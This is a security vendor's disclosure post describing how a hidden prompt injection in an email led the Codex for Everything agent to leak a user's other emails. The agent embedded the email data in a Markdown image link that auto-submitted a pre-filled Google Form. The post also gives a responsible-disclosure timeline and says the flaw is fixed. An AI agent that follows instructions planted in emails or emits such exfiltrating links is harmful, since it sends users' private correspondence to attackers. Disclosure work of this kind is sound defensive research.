Codex Exfiltrates Connector Data | PromptArmorBook a Demo
Threat Intel<br>Codex for Everything Exfiltrates Connected DataOverview<br>‘Codex for Everything’ is an update to Codex that enables its use beyond coding, for day-to-day tasks. It includes over 90 new plugins and features, such as ‘browser use’ and ‘computer use’, that make Codex an all-purpose agent in a bid to compete with Anthropic’s Claude Cowork and Microsoft’s Copilot Cowork.<br>In this article, we demonstrate that a malicious email could manipulate Codex for Everything to exfiltrate the complete contents of other emails Codex was reviewing. Exfiltration occurred via outputting a malicious image, which triggered an automatic submission to an attacker-controlled Google form.<br>We demonstrate the vulnerability via an indirect prompt injection in an untrusted email, but an injection in any untrusted data source could exploit the vulnerability across Codex use cases.<br>This vulnerability was responsibly disclosed on April 21, 2026, and has been remediated by OpenAI. More details on the responsible disclosure are at the end of the article.<br>The Attack Chain<br>1.p]:m-0 [&>p]:text-white/70">A user asks Codex for help reviewing emails
p]:text-[15px] [&>p]:mb-3 [&>p:last-child]:mb-0">User asks Codex for Everything to triage their emailsOpenAI's Email plugin comes with a Skill for triaging emails, and reviewing emails is part of a demonstrated use case in the Codex for Everything release.
2.p]:m-0 [&>p]:text-white/70">A prompt injection is hidden in one of the emails Codex finds
p]:text-[15px] [&>p]:mb-3 [&>p:last-child]:mb-0">The user’s inbox contains an email from an external party that includes a prompt injection.<br>The user recieves an email containing a prompt injection.Email content is not displayed to the user during Codex’s review process.
3.p]:m-0 [&>p]:text-white/70">Codex is manipulated to output an insecure image, triggering data exfiltration
p]:text-[15px] [&>p]:mb-3 [&>p:last-child]:mb-0">Codex is manipulated to generate and output Markdown image syntax that contains a pre-filled Google Form submission link, populated with the victim's email data. This automatically submits the victims' emails to an attacker-controlled Google Form.<br>No user interaction is required beyond submission of the initial email triage query.<br>Codex outputs a malicious image that exfiltrates data.
4.p]:m-0 [&>p]:text-white/70">The attacker can view the victim’s emails in their Google Form submissions
p]:text-[15px] [&>p]:mb-3 [&>p:last-child]:mb-0">This attack exfiltrated sensitive emails, including legal correspondence, organizational financial planning, and security-related notifications.<br>Data exfiltrated from Codex is in the attacker's Google Form responses
Responsible Disclosure<br>This vulnerability was responsibly disclosed on Apr 21, 2026, and the vulnerability has been remediated by OpenAI.<br>Timeline<br>Apr 21, 2026 PromptArmor discloses to OpenAI via HackerOne<br>May 6, 2026 HackerOne requests additional details<br>May 6, 2026 PromptArmor follows up<br>May 14, 2026 HackerOne validates and triages the vulnerability<br>May 21, 2026 Public disclosure
PromptArmor Threat Intelligence<br>Is your organization protected from AI in vendors?<br>PromptArmor continuously monitors across your portfolio of third party AI in vendors, skills, plugins, connectors, MCP servers, models and more.<br>We detect vulnerabilities and changes like this, surfacing risk before it becomes an incident.<br>Learn more
More Threat Intelligence